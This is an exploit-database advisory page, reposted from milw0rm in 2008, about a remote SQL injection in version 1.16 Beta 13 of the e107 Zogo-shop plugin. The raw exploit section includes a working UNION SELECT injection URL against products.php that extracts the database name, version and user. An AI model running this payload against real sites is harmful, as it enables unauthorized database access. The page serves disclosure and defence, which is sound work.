Zogo-shop 1.16 Beta 13 & e-107 Zozo-shop Plugins remote Sql Ä°nj.

vendor:

e107 Zozo-shop Plugins

by:

Cr@zy_King / t4cs1zkr4L

CVSS

HIGH

SQL Injection

CWE

Product Name: e107 Zozo-shop Plugins

Affected Version From: 1.16 Beta 13

Affected Version To: 1.16 Beta 13

Patch Exists: No

Related CWE: N/A

CPE: a:e107_project:e107

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Zogo-shop 1.16 Beta 13 & e-107 Zozo-shop Plugins remote Sql Ä°nj.

Zogo-shop 1.16 Beta 13 & e-107 Zozo-shop Plugins are vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

By Cr@zy_King / t4cs1zkr4L

crazy_kinq@hotmail.co.uk / K0Lp4Lara dikkat : )

Zogo-shop 1.16 Beta 13 & e-107 Zozo-shop Plugins remote Sql Ä°nj.

Down : http://www.mytipper.com/download.php?view.19

Sql : http://localhost/products.php?cat=-1+union+select+database(),version(),3,4,5,6,user()/*

Greatz : KnockOut / Dr.Hack3r / Crackers_Child / Rm-x / Tr_ip / DreamTurk / Eno7 / Sabot4qe

Online CGI/Perl Dersleri : http://www.coderx.org/Default.aspx?g=posts&t=89 / kaÃ§Ä±rmayÄ±n.

-----------------------Her ayrÄ±LÄ±k bir vurgun degmeyin ya$LarÄ±ma-----------------------

for exmp :

http://www.xxx.com/e107_plugins/zogo-shop/products.php?cat=-1+union+select+database(),version(),3,4,5,6,user()/* 

# milw0rm.com [2008-05-13]